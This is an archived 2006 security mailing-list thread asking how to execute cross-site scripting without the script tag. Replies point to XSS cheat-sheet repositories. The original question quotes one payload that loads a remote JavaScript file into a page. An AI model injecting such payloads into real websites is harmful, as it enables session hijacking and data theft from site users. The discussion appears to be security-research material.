Re: XSS - how to run script

From: pdp (architect) (pdp.gnucitizen@googlemail.com)
Date: Fri Oct 20 2006 - 00:23:20 EDT

• Next message: Julien: "TLS implementation test"
• Previous message: Joshua Perrymon: "RE: XSS - how to run script"
• In reply to: A. R.: "Re: XSS - how to run script"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

RSnake's library is available here as well

http://www.gnucitizen.org/xssdb/

On 10/20/06, A. R. <r00t@northernfortress.net> wrote:
> One of the best repositories of exotic ways to perform XSS (with or
> without evasion, with or without script tag) is the XSS cheat sheet:
> http://ha.ckers.org/xss.html
>
> hth
>
> --
> icesurfer
>
> Tal Argoni wrote:
> > Does anyone have any
> > techniques/knowledge/examples/ideas/etc
> > of how it possible to run script
> > without using the <script> tag,
> > and without evasion techniques ?
> > <script
> > src=http://www.www.com/XSS.js></script>
> > Thanks allot
> > LegendaryZion
> >
> >
> >
> > ------------------------------------------------------------------------
> > This List Sponsored by: Cenzic
> >
> > Need to secure your web apps?
> > Cenzic Hailstorm finds vulnerabilities fast.
> > Click the link to buy it, try it or download Hailstorm for FREE.
> > http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> > ------------------------------------------------------------------------
> >
> >
>
> ------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Need to secure your web apps?
> Cenzic Hailstorm finds vulnerabilities fast.
> Click the link to buy it, try it or download Hailstorm for FREE.
> http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> ------------------------------------------------------------------------
>
>

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------

• Next message: Julien: "TLS implementation test"
• Previous message: Joshua Perrymon: "RE: XSS - how to run script"
• In reply to: A. R.: "Re: XSS - how to run script"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:13 EDT